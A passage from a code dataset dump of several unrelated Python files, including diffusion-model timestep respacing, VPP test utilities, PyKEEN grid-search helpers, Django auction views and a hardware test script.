len(result['technology']))\n\n item = result['technology'][5]\n self.assertEqual('engineering', item['i'])\n self.assertEqual(False, item['l'])\n\n def testEngineeringToDict(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, 'engineering', 2)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['engineering']))\n self.assertEqual(8, len(result['software/computation']))\n self.assertEqual('compilers', result['software/computation'][5]['i'])\n\n def testRootToJson(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n resultJson = subjects.GetSubjectsJson(taxonomy, None)\n self.assertTrue(isinstance(resultJson, basestring))\n\n result = simplejson.loads(resultJson)\n self.assertTrue(isinstance(result, list))\n\n self.assertEqual(None, result[0])\n result = result[1]\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['root']))\n self.assertEqual(6, len(result['technology']))\n\n item = result['technology'][5]\n self.assertEqual('engineering', item['i'])\n self.assertEqual(False, item['l'])\n","repo_name":"arjunsatyapal/lantern","sub_path":"demo1-test/test/test_subjects.py","file_name":"test_subjects.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24718058851","text":"import numpy as np\nimport torch as th\n\nfrom .gaussian_diffusion import GaussianDiffusion\n\n\ndef space_timesteps(num_timesteps, section_counts):\n \"\"\"\n Create a list of timesteps to use from an original diffusion process,\n given the number of timesteps we want to take from equally-sized portions\n of the original process.\n\n For example, if there's 300 timesteps and the section counts are [10,15,20]\n then the first 100 timesteps are strided to be 10 timesteps, the second 100\n are strided to be 15 timesteps, and the final 100 are strided to be 20.\n\n If the stride is a string starting with \"ddim\", then the fixed striding\n from the DDIM paper is used, and only one section is allowed.\n\n :param num_timesteps: the number of diffusion steps in the original\n process to divide up.\n :param section_counts: either a list of numbers, or a string containing\n comma-separated numbers, indicating the step count\n per section. As a special case, use \"ddimN\" where N\n is a number of steps to use the striding from the\n DDIM paper.\n :return: a set of diffusion steps from the original process to use.\n \"\"\"\n if isinstance(section_counts, str):\n if section_counts.startswith(\"ddim\"):\n desired_count = int(section_counts[len(\"ddim\"):])\n for i in range(1, num_timesteps):\n if len(range(0, num_timesteps, i)) == desired_count:\n return set(range(0, num_timesteps, i))\n section_counts = [int(x) for x in section_counts.split(\",\")]\n if isinstance(section_counts, int):\n section_counts = [section_counts]\n size_per = num_timesteps // len(section_counts)\n extra = num_timesteps % len(section_counts)\n start_idx = 0\n all_steps = []\n\n if len(section_counts) == 1 and section_counts[0] > num_timesteps:\n return set(np.linspace(start=0, stop=num_timesteps, num=section_counts[0]))\n\n for i, section_count in enumerate(section_counts):\n size = size_per + (1 if i < extra else 0)\n if size < section_count:\n raise ValueError(\n f\"cannot divide section of {size} steps into {section_count}\"\n )\n if section_count <= 1:\n frac_stride = 1\n else:\n frac_stride = (size - 1) / (section_count - 1)\n cur_idx = 0.0\n taken_steps = []\n for _ in range(section_count):\n taken_steps.append(start_idx + round(cur_idx))\n cur_idx += frac_stride\n all_steps += taken_steps\n start_idx += size\n return set(all_steps)\n\n\nclass SpacedDiffusion(GaussianDiffusion):\n \"\"\"\n A diffusion process which can skip steps in a base diffusion process.\n\n :param use_timesteps: a collection (sequence or set) of timesteps from the\n original diffusion process to retain.\n :param kwargs: the kwargs to create the base diffusion process.\n \"\"\"\n\n def __init__(self, use_timesteps, conf=None, **kwargs):\n self.use_timesteps = set(use_timesteps)\n self.original_num_steps = len(kwargs[\"betas\"])\n self.conf = conf\n\n base_diffusion = GaussianDiffusion(conf=conf,\n **kwargs) # pylint: disable=missing-kwoa\n\n if conf.respace_interpolate:\n new_betas = resample_betas(\n kwargs[\"betas\"], int(conf.timestep_respacing))\n self.timestep_map = list(range(len(new_betas)))\n else:\n self.timestep_map = []\n new_betas = []\n last_alpha_cumprod = 1.0\n for i, alpha_cumprod in enumerate(base_diffusion.alphas_cumprod):\n if i in self.use_timesteps:\n new_betas.append(1 - alpha_cumprod / last_alpha_cumprod)\n last_alpha_cumprod = alpha_cumprod\n self.timestep_map.append(i)\n\n kwargs[\"betas\"] = np.array(new_betas)\n\n if conf.use_value_logger:\n conf.value_logger.add_value(\n new_betas, 'new_betas SpacedDiffusion')\n\n super().__init__(conf=conf, **kwargs)\n\n def p_mean_variance(\n self, model, *args, **kwargs\n ): # pylint: disable=signature-differs\n return super().p_mean_variance(self._wrap_model(model), *args, **kwargs)\n\n def training_losses(\n self, model, *args, **kwargs\n ): # pylint: disable=signature-differs\n return super().training_losses(self._wrap_model(model), *args, **kwargs)\n\n def condition_mean(self, cond_fn, *args, **kwargs):\n return super().condition_mean(self._wrap_model(cond_fn), *args, **kwargs)\n\n def condition_score(self, cond_fn, *args, **kwargs):\n return super().condition_score(self._wrap_model(cond_fn), *args, **kwargs)\n\n def _wrap_model(self, model):\n if isinstance(model, _WrappedModel):\n return model\n return _WrappedModel(\n model, self.timestep_map, self.rescale_timesteps,\n self.original_num_steps, self.conf\n )\n\n def _scale_timesteps(self, t):\n # Scaling is done by the wrapped model.\n return t\n\n\nclass _WrappedModel:\n def __init__(self, model, timestep_map, rescale_timesteps, original_num_steps, conf):\n self.model = model\n self.timestep_map = timestep_map\n self.rescale_timesteps = rescale_timesteps\n self.original_num_steps = original_num_steps\n self.conf = conf\n\n def __call__(self, x, ts, **kwargs):\n map_tensor = th.tensor( # pylint: disable=not-callable\n self.timestep_map, device=ts.device, dtype=ts.dtype)\n new_ts = map_tensor[ts]\n if self.rescale_timesteps:\n raise NotImplementedError()\n #new_ts = self.do_rescale_timesteps(new_ts)\n\n if self.conf.respace_interpolate:\n new_ts = new_ts.float() * (\n (self.conf.diffusion_steps - 1) / (float(self.conf.timestep_respacing) - 1.0))\n\n return self.model(x, new_ts, **kwargs)\n\n def do_rescale_timesteps(self, new_ts):\n new_ts = new_ts.float() * (1000.0 / self.original_num_steps)\n return new_ts\n","repo_name":"andreas128/RePaint","sub_path":"guided_diffusion/respace.py","file_name":"respace.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","stars":1621,"dataset":"github-code","pt":"48"} +{"seq_id":"9121979401","text":"import binascii\n\nfrom robot.api import logger\n\nfrom resources.libraries.python.Constants import Constants\nfrom resources.libraries.python.DUTSetup import DUTSetup\nfrom resources.libraries.python.PapiExecutor import PapiExecutor\nfrom resources.libraries.python.ssh import exec_cmd_no_error\nfrom resources.libraries.python.topology import NodeType\n\n\nclass VPPUtil(object):\n \"\"\"General class for any VPP related methods/functions.\"\"\"\n\n @staticmethod\n def show_vpp_settings(node, *additional_cmds):\n \"\"\"Print default VPP settings. In case others are needed, can be\n accepted as next parameters (each setting one parameter), preferably\n in form of a string.\n\n :param node: VPP node.\n :param additional_cmds: Additional commands that the vpp should print\n settings for.\n :type node: dict\n :type additional_cmds: tuple\n \"\"\"\n def_setting_tb_displayed = {\n 'IPv6 FIB': 'ip6 fib',\n 'IPv4 FIB': 'ip fib',\n 'Interface IP': 'int addr',\n 'Interfaces': 'int',\n 'ARP': 'ip arp',\n 'Errors': 'err'\n }\n\n if additional_cmds:\n for cmd in additional_cmds:\n def_setting_tb_displayed['Custom Setting: {}'.format(cmd)] = cmd\n\n for _, cmd in def_setting_tb_displayed.items():\n command = 'vppctl sh {cmd}'.format(cmd=cmd)\n exec_cmd_no_error(node, command, timeout=30, sudo=True)\n\n @staticmethod\n def restart_vpp_service(node):\n \"\"\"Restart VPP service on the specified topology node.\n\n :param node: Topology node.\n :type node: dict\n \"\"\"\n DUTSetup.restart_service(node, Constants.VPP_UNIT)\n\n @staticmethod\n def restart_vpp_service_on_all_duts(nodes):\n \"\"\"Restart VPP service on all DUT nodes.\n\n :param nodes: Topology nodes.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.restart_vpp_service(node)\n\n @staticmethod\n def stop_vpp_service(node):\n \"\"\"Stop VPP service on the specified topology node.\n\n :param node: Topology node.\n :type node: dict\n \"\"\"\n DUTSetup.stop_service(node, Constants.VPP_UNIT)\n\n @staticmethod\n def stop_vpp_service_on_all_duts(nodes):\n \"\"\"Stop VPP service on all DUT nodes.\n\n :param nodes: Topology nodes.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.stop_vpp_service(node)\n\n @staticmethod\n def verify_vpp_installed(node):\n \"\"\"Verify that VPP is installed on the specified topology node.\n\n :param node: Topology node.\n :type node: dict\n \"\"\"\n cmd = 'command -v vpp'\n exec_cmd_no_error(\n node, cmd, message='VPP is not installed!')\n\n @staticmethod\n def verify_vpp_started(node):\n \"\"\"Verify that VPP is started on the specified topology node.\n\n :param node: Topology node.\n :type node: dict\n \"\"\"\n cmd = ('vppctl show pci 2>&1 | '\n 'fgrep -v \"Connection refused\" | '\n 'fgrep -v \"No such file or directory\"')\n exec_cmd_no_error(\n node, cmd, sudo=True, message='VPP failed to start!', retries=120)\n\n @staticmethod\n def verify_vpp(node):\n \"\"\"Verify that VPP is installed and started on the specified topology\n node.\n\n :param node: Topology node.\n :type node: dict\n :raises RuntimeError: If VPP service fails to start.\n \"\"\"\n VPPUtil.verify_vpp_installed(node)\n try:\n # Verify responsivness of vppctl.\n VPPUtil.verify_vpp_started(node)\n # Verify responsivness of PAPI.\n VPPUtil.show_log(node)\n finally:\n DUTSetup.get_service_logs(node, Constants.VPP_UNIT)\n\n @staticmethod\n def verify_vpp_on_all_duts(nodes):\n \"\"\"Verify that VPP is installed and started on all DUT nodes.\n\n :param nodes: Nodes in the topology.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.verify_vpp(node)\n\n @staticmethod\n def vpp_show_version(node, verbose=True):\n \"\"\"Run \"show_version\" PAPI command.\n\n :param node: Node to run command on.\n :param verbose: Show version, compile date and compile location if True\n otherwise show only version.\n :type node: dict\n :type verbose: bool\n :returns: VPP version.\n :rtype: str\n \"\"\"\n with PapiExecutor(node) as papi_exec:\n data = papi_exec.add('show_version').get_replies().verify_reply()\n version = ('VPP version: {ver}\\n'.\n format(ver=data['version'].rstrip('\\0x00')))\n if verbose:\n version += ('Compile date: {date}\\n'\n 'Compile location: {cl}\\n '.\n format(date=data['build_date'].rstrip('\\0x00'),\n cl=data['build_directory'].rstrip('\\0x00')))\n logger.info(version)\n return data['version'].rstrip('\\0x00')\n\n @staticmethod\n def show_vpp_version_on_all_duts(nodes):\n \"\"\"Show VPP version verbose on all DUTs.\n\n :param nodes: Nodes in the topology.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.vpp_show_version(node)\n\n @staticmethod\n def vpp_show_interfaces(node):\n \"\"\"Run \"show interface\" CLI command.\n\n :param node: Node to run command on.\n :type node: dict\n \"\"\"\n\n cmd = 'sw_interface_dump'\n cmd_reply = 'sw_interface_details'\n args = dict(name_filter_valid=0, name_filter='')\n err_msg = 'Failed to get interface dump on host {host}'.format(\n host=node['host'])\n with PapiExecutor(node) as papi_exec:\n papi_resp = papi_exec.add(cmd, **args).get_replies(err_msg)\n\n papi_if_dump = papi_resp.reply[0]['api_reply']\n\n if_data = list()\n for item in papi_if_dump:\n data = item[cmd_reply]\n data['interface_name'] = data['interface_name'].rstrip('\\x00')\n data['tag'] = data['tag'].rstrip('\\x00')\n data['l2_address'] = str(':'.join(binascii.hexlify(\n data['l2_address'])[i:i + 2] for i in range(0, 12, 2)).\n decode('ascii'))\n if_data.append(data)\n # TODO: return only base data\n logger.trace('Interface data of host {host}:\\n{if_data}'.format(\n host=node['host'], if_data=if_data))\n\n @staticmethod\n def vpp_enable_traces_on_dut(node, fail_on_error=False):\n \"\"\"Enable vpp packet traces on the DUT node.\n\n :param node: DUT node to set up.\n :param fail_on_error: If True, keyword fails if an error occurs,\n otherwise passes.\n :type node: dict\n :type fail_on_error: bool\n \"\"\"\n cmds = [\n \"trace add dpdk-input 50\",\n \"trace add vhost-user-input 50\",\n \"trace add memif-input 50\"\n ]\n\n for cmd in cmds:\n try:\n PapiExecutor.run_cli_cmd(node, cmd)\n except AssertionError:\n if fail_on_error:\n raise\n\n @staticmethod\n def vpp_enable_traces_on_all_duts(nodes, fail_on_error=False):\n \"\"\"Enable vpp packet traces on all DUTs in the given topology.\n\n :param nodes: Nodes in the topology.\n :param fail_on_error: If True, keyword fails if an error occurs,\n otherwise passes.\n :type nodes: dict\n :type fail_on_error: bool\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.vpp_enable_traces_on_dut(node, fail_on_error)\n\n @staticmethod\n def vpp_enable_elog_traces_on_dut(node):\n \"\"\"Enable API/CLI/Barrier traces on the DUT node.\n\n :param node: DUT node to set up.\n :type node: dict\n \"\"\"\n PapiExecutor.run_cli_cmd(node, \"elog trace api cli barrier\")\n\n @staticmethod\n def vpp_enable_elog_traces_on_all_duts(nodes):\n \"\"\"Enable API/CLI/Barrier traces on all DUTs in the given topology.\n\n :param nodes: Nodes in the topology.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.vpp_enable_elog_traces_on_dut(node)\n\n @staticmethod\n def show_event_logger_on_dut(node):\n \"\"\"Show event logger on the DUT node.\n\n :param node: DUT node to show traces on.\n :type node: dict\n \"\"\"\n PapiExecutor.run_cli_cmd(node, \"show event-logger\")\n\n @staticmethod\n def show_event_logger_on_all_duts(nodes):\n \"\"\"Show event logger on all DUTs in the given topology.\n\n :param nodes: Nodes in the topology.\n :type nodes: dict\n \"\"\"\n for node in nodes.values():\n if node['type'] == NodeType.DUT:\n VPPUtil.show_event_logger_on_dut(node)\n\n @staticmethod\n def show_log(node):\n \"\"\"Show log on the specified topology node.\n\n :param node: Topology node.\n :type node: dict\n :returns: VPP log data.\n :rtype: list\n \"\"\"\n return PapiExecutor.run_cli_cmd(node, \"show log\")[\"reply\"]\n\n @staticmethod\n def vpp_show_threads(node):\n \"\"\"Show VPP threads on node.\n\n :param node: Node to run command on.\n :type node: dict\n :returns: VPP thread data.\n :rtype: list\n \"\"\"\n with PapiExecutor(node) as papi_exec:\n data = papi_exec.add('show_threads').get_replies().\\\n verify_reply()[\"thread_data\"]\n\n threads_data = list()\n for thread in data:\n thread_data = list()\n for item in thread:\n if isinstance(item, unicode):\n item = item.rstrip('\\x00')\n thread_data.append(item)\n threads_data.append(thread_data)\n\n logger.info(\"show threads:\\n{threads}\".format(threads=threads_data))\n\n return threads_data\n","repo_name":"preym17/csit","sub_path":"resources/libraries/python/VPPUtil.py","file_name":"VPPUtil.py","file_ext":"py","file_size_in_byte":10323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73292147984","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Utilities for PyKEEN playtime.\"\"\"\n\nfrom __future__ import annotations\n\nimport itertools as itt\nimport json\nimport logging\nimport math\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Any, Callable, ClassVar, Dict, Iterable, Mapping, Optional, Sequence, Tuple, Union\n\nimport pandas as pd\nfrom tabulate import tabulate\nfrom tqdm import tqdm\n\n__all__ = [\n 'fix_logging',\n 'iter_configs_trials',\n 'Runner',\n 'GridType',\n]\n\nfrom pykeen.constants import PYKEEN_EXPERIMENTS\n\nGridType = Mapping[str, Sequence[Any]]\n\n\ndef fix_logging() -> None:\n \"\"\"Fix over-logging in PyKEEN.\"\"\"\n logging.getLogger('pykeen.evaluation.evaluator').setLevel(logging.ERROR)\n logging.getLogger('pykeen.stoppers.early_stopping').setLevel(logging.ERROR)\n logging.getLogger('pykeen.triples.triples_factory').setLevel(logging.ERROR)\n logging.getLogger('pykeen.models.cli').setLevel(logging.ERROR)\n\n\ndef iter_configs_trials(\n grid: Union[str, Path, Mapping[str, Sequence[Any]]],\n *,\n trials: Optional[int] = None,\n **kwargs,\n):\n \"\"\"Iterate over several configurations for a given number of trials.\n\n :param grid: Either a grid search dictionary or a str/path for a JSON\n file containing one.\n :param trials: The number of trials that should be conducted fon each configuration. Defaults to 10.\n :param kwargs: Keyword arguments to pass through to :func:`tqdm.tqdm`.\n :returns: An iterator for trials\n \"\"\"\n config_iterator = _iter_configs(grid=grid, **kwargs)\n return _ConfigTrialIterator(config_iterator, trials)\n\n\ndef _iter_configs(\n grid: Union[str, Path, Mapping[str, Sequence[Any]]],\n *,\n order: Optional[Sequence[str]] = None,\n **kwargs,\n):\n if isinstance(grid, (str, Path)):\n return _ConfigIterator.from_path(grid, order=order, **kwargs)\n return _ConfigIterator(grid, order=order, **kwargs)\n\n\nclass _ConfigTrialIterator:\n def __init__(self, config_iterator: _ConfigIterator, trials: Optional[int] = None):\n \"\"\"Initialize the configuration/trial iterator.\n\n :param config_iterator: the configuration iterator to wrap\n :param trials: the number of trials, defaults to 10.\n \"\"\"\n self.config_iterator = config_iterator\n self.trials = trials or 10\n\n @property\n def keys(self):\n \"\"\"Return the keys of the wrapped iterator.\"\"\"\n return self.config_iterator.keys\n\n def __iter__(self) -> Iterable[Tuple[Mapping[str, Any], int]]:\n with tqdm(\n self.config_iterator.kwargs,\n total=self.trials * self.config_iterator.total,\n **self.config_iterator.kwargs,\n ) as it:\n for config in iter(self.config_iterator):\n it.set_postfix(config)\n for trial in range(1, 1 + self.trials):\n it.update()\n yield config, trial\n\n\nclass _ConfigIterator:\n def __init__(self, grid, *, order: Optional[Sequence[str]] = None, **kwargs):\n \"\"\"Initialize the configuration iterator.\n\n :param grid: The grid to generate configurations over\n :param order: The optional ordering of the keys\n :param kwargs: keyword arguments to pass through to :func:`tqdm.tqdm`\n \"\"\"\n if order:\n self.keys = order\n self.values = [grid[k] for k in order]\n else:\n self.keys, self.values = zip(*grid.items()) # type: ignore\n\n self.total = math.prod(len(v) for v in self.values)\n self.kwargs = kwargs\n\n @classmethod\n def from_path(cls, path: Union[str, Path], *, order: Optional[Sequence[str]] = None, **kwargs) -> _ConfigIterator:\n \"\"\"Create a config iterator from a grid stored in a JSON file.\"\"\"\n with open(path) as file:\n return cls(json.load(file), order=order, **kwargs)\n\n def __iter__(self):\n for v in itt.product(*self.values):\n yield dict(zip(self.keys, v))\n\n\nclass Runner(ABC):\n \"\"\"A harness for grid search experiment runners.\"\"\"\n\n #: The name of the experiment\n name: ClassVar[str]\n #: The labels of the results returned by the run() function\n result_labels: ClassVar[Sequence[str]]\n #: The grid to search\n grid: ClassVar[GridType]\n #: A dictionary of reformatters for config values\n formatters: ClassVar[Mapping[str, Callable[[Any], str]]] = {}\n\n def __init__(self, trials: Optional[int] = None):\n \"\"\"Initialize the runner.\n\n :param trials: The number of trials to run. Defaults to 10.\n :raises ValueError: if the ``result_labels`` variable is the wrong length\n \"\"\"\n self.directory = PYKEEN_EXPERIMENTS / self.name\n self.directory.mkdir(exist_ok=True, parents=True)\n self.path = self.directory / 'results.tsv'\n\n self.it = iter_configs_trials(\n self.grid,\n trials=trials,\n )\n\n precalculated: Dict[Tuple[Any, ...], Sequence[Any]] = {}\n if self.path.exists():\n key_len = len(self.it.keys) + 1\n _df = pd.read_csv(self.path, sep='\\t')\n for row in map(tuple, _df.values):\n key = row[:key_len]\n # tqdm.write(f'precalculated: {\",\".join(map(str, key))}')\n precalculated[key] = row[key_len:]\n\n self.rows = []\n self.columns = (*self.it.keys, 'trial', *self.result_labels)\n with self.path.open('w') as file:\n print(*self.columns, sep='\\t', file=file)\n for config, trial in self.it:\n key = tuple(self._format(key, config[key]) for key in self.it.keys) + (trial,)\n if key in precalculated:\n row_end = precalculated[key]\n else:\n # tqdm.write(f'calculated: {\",\".join(map(str, key))}')\n row_end = self.run(config, trial)\n if len(row_end) != len(self.result_labels):\n raise ValueError(\n f'Not enough results returned. '\n f'Got {len(row_end)}, should have got {len(self.result_labels)}',\n )\n row = (*key, *row_end)\n print(*row, sep='\\t', file=file)\n self.rows.append(row)\n\n self.df = pd.DataFrame(\n self.rows,\n columns=self.columns,\n )\n\n def _format(self, key: str, value) -> str:\n formatter = self.formatters.get(key)\n if formatter is None:\n return value\n return formatter(value)\n\n @abstractmethod\n def run(self, config, trial) -> Sequence[Any]:\n \"\"\"Run the experiment.\"\"\"\n raise NotImplementedError\n\n def print(self) -> None:\n \"\"\"Print the results of all experiments.\"\"\"\n print(tabulate(self.df.values, headers=self.df.columns))\n","repo_name":"cthoyt/pykeen-playtime","sub_path":"src/pykeen_playtime/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34694144351","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404,redirect\nfrom django.urls import reverse\nfrom django import forms \nfrom .models import User\nfrom .models import Listing\nfrom .models import Bid\nfrom .models import Comment\nfrom decimal import Decimal \nfrom django.contrib import messages \nfrom django.db.models import Count\n\n\n\ndef index(request):\n return render(request, \"auctions/index.html\", {\n \"active_listings\" : Listing.objects.all()\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\nclass CreateNewListingForm(forms.Form):\n title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'autofocus': 'autofocus'}))\n description = forms.CharField(widget=forms.Textarea)\n starting_bid = forms.DecimalField(label=\"Starting Bid\")\n category = forms.CharField(label=\"Category\")\n image_url = forms.CharField(label=\"Image URL\")\n\nclass see_listing(forms.Form):\n title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'autofocus': 'autofocus'}))\n description = forms.CharField(widget=forms.Textarea)\n starting_bid = forms.DecimalField(label=\"Starting Bid\")\n category = forms.CharField(label=\"Category\")\n image_url = forms.CharField(label=\"Image URL\")\n\n#class CommentForm(forms.Form):\n # comment_text = forms.CharField(widget=forms.Textarea(attrs={'rows': 3}), required=True)\nclass CommentForm(forms.Form):\n comment_text = forms.CharField(\n widget=forms.Textarea(\n attrs={\n 'rows': 3,\n 'placeholder': 'Make comment' # Add this\n }\n ),\n label=\"\",\n required=True\n )\n\ndef create_listing(request):\n if request.method == 'GET':\n form = CreateNewListingForm()\n return render(request, 'auctions/clisting.html', {'form': form})\n else:\n if request.method == 'POST':\n form = CreateNewListingForm(request.POST)\n # Validate form data\n if form.is_valid():\n # Save the new listing\n new_listing = Listing(\n title=form.cleaned_data['title'],\n description=form.cleaned_data['description'],\n min_start_bid=form.cleaned_data['starting_bid'],\n category=form.cleaned_data['category'],\n image_url=form.cleaned_data['image_url'],\n listing_creator= request.user,\n active = True\n )\n new_listing.save()\n\n # Redirect to the index page (or another page of your choice)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef listing_detail(request, listing_id):\n\n listing = Listing.objects.get(pk=listing_id) \n\n if listing.winner is None: # if listing.winner is NOT NONE, then the listing.winner has already been set, no need to sort the bids again\n winning_bid = listing.highest_bid() \n if winning_bid is not None: # if winning_bid is None, that means listing.winner hasnt been set, it is currently None, and that is ok. \n listing.winner = winning_bid.user \n listing.save()\n\n if listing.winner == request.user: # if the current user won\n context = {\n 'listing': listing,\n 'comment_form' : CommentForm(),\n 'winner_string': \"Congrats, you are the winner of this auction!\"\n }\n elif listing.winner is not None: # if we need to inform about another user winning\n context = {\n 'listing': listing,\n 'comment_form' : CommentForm(),\n 'winner_string': f\"{listing.winner.username} has won the auction!\"\n }\n elif listing.winner is None and listing.active is False:\n context = {\n 'listing': listing,\n 'comment_form' : CommentForm(),\n 'winner_string': \"The auction owner decided to close the auciton before a single bid has been made!\"\n } \n else: # if no one is currently the winner\n context = {'listing': listing,\n 'comment_form' : CommentForm()\n }\n \n return render(request, 'auctions/listing.html', context)\n\ndef update_watchlist(request, listing_id):\n listing = Listing.objects.get(pk=listing_id) \n if request.method == 'POST':\n if request.POST.get('watchlist') == \"yes\":\n request.user.watchlist.add(listing)\n else:\n request.user.watchlist.remove(listing)\n return redirect('listing_detail', listing_id=listing.id)\n\ndef place_bid(request, listing_id):\n listing = Listing.objects.get(pk=listing_id)\n if request.method == 'POST' and request.user.is_authenticated:\n bid_amount = Decimal(request.POST['bid_amount'])\n\n # We get the highest bid using the highest_bid() method. If no bids have been made yet, \n # it will return None, and we'll consider the minimum start bid as the highest bid.\n highest_bid = listing.highest_bid()\n if highest_bid is not None:\n highest_bid_amount = highest_bid.bid_ammount\n else:\n highest_bid_amount = listing.min_start_bid\n\n # We check if the bid is valid (i.e., greater than the current highest bid and the listing is active).\n if bid_amount > highest_bid_amount and listing.active:\n # Instead of updating a field in the Listing model, we now create a new Bid object.\n bid = Bid(listing=listing, bid_ammount=bid_amount, user=request.user)\n bid.save()\n messages.success(request, \"Congrats! You are currently the highest bidder!\")\n else:\n messages.error(request, 'Your bid must be higher than the current highest bid and the minimum bid.')\n return redirect('listing_detail', listing_id=listing.id)\n\ndef make_comment(request, listing_id):\n listing = Listing.objects.get(pk=listing_id)\n\n if request.method == 'POST' and request.user.is_authenticated:\n form = CommentForm(request.POST)\n\n if form.is_valid():\n comment_text = form.cleaned_data.get('comment_text')\n\n if comment_text.strip() == '':\n messages.error(request, 'You cannot submit an empty comment.')\n else:\n comment = Comment(listing=listing, text=comment_text.strip(), user=request.user)\n comment.save()\n else:\n # This else branch is for cases where the form is not valid\n messages.error(request, 'There was an error with your comment submission.')\n \n return redirect('listing_detail', listing_id=listing.id)\n\ndef close_auction(request,listing_id):\n if request.method == 'POST':\n listing = Listing.objects.get(pk=listing_id)\n if request.user == listing.listing_creator: # Check if the user is the creator of the listing\n listing.active = False # Set the listing as inactive\n listing.save() # Save the changes\n messages.success(request, \"You have now closed the auction!\")\n else:\n messages.error(request, \"Only the auction creator can close the auction.\")\n return redirect('listing_detail', listing_id=listing.id) \n\ndef watchlist(request):\n if request.user.is_authenticated:\n watchlist_items = request.user.watchlist.all()\n context = {'watchlist_items': watchlist_items}\n return render(request, 'auctions/watchlist.html', context)\n else:\n return redirect('login') # redirect to login page if user is not authenticated\n\ndef categories(request):\n categories = Listing.objects.values('category').annotate(total=Count('category')).order_by('category')\n context = {'categories': categories}\n return render(request, 'auctions/categories.html', context)\n\ndef category_listings(request, category_name):\n listings = Listing.objects.filter(category=category_name, active=True)\n context = {'listings': listings, 'category_name': category_name}\n return render(request, 'auctions/category_listings.html', context)\n","repo_name":"calcmaster7/hack_bay","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5429591309","text":"from os import sys, path \nsys.path.append(path.join(path.dirname(path.dirname(path.abspath(__file__))), 'hil'))\nfrom hil import HIL\nimport time\n\ndef test_brake_fail(hil):\n hil.start_test(test_brake_fail.__name__)\n\n fstp = hil.get_component(\"FrontESTOP\")\n bots = hil.get_component(\"BOTS\")\n btn = hil.get_component(\"StartButton\")\n do = hil.get_component(\"DigiOut\")\n di = hil.get_component(\"DigiIn\")\n ai = hil.get_component(\"AnalogIn\")\n\n for i in range(10):\n btn.state = 0\n time.sleep(0.01)\n btn.state = 1\n time.sleep(0.01)\n\n ct = 100\n\n a = time.perf_counter()\n for i in range(ct):\n do.state = 1\n b = time.perf_counter()\n for i in range(ct):\n l = di.state\n c = time.perf_counter()\n for i in range(ct):\n l = ai.state\n d = time.perf_counter()\n print(f\"Avg Write time: {1000 * (b-a) / ct} ms\")\n print(f\"Avg Read time: {1000 * (c-b)/ct} ms\")\n print(f\"Avg Analog Read time: {1000 *(d-c)/ct} ms\")\n\n print(f\"State: {ai.state}, Set: {do.state}\")\n do.state = 0\n print(f\"State: {ai.state}, Set: {do.state}\")\n\n fstp.state = 1\n bots.state = 1\n\n time.sleep(0.1)\n hil.check(False, \"First\")\n hil.check(True, \"Second\")\n\n fstp.state = 0\n\n time.sleep(0.1)\n\n bots.state = 0\n\n hil.end_test()\n\n\nif __name__ == \"__main__\":\n hil = HIL()\n hil.load_config(\"config_test.json\")\n test_brake_fail(hil)\n hil.shutdown()\n","repo_name":"PurdueElectricRacing/HIL-Testing","sub_path":"scripts/test_test1.py","file_name":"test_test1.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36565553222","text":"import sys\nimport logging\nimport pickle\nimport pandas as pd\nfrom data.prepare_data import 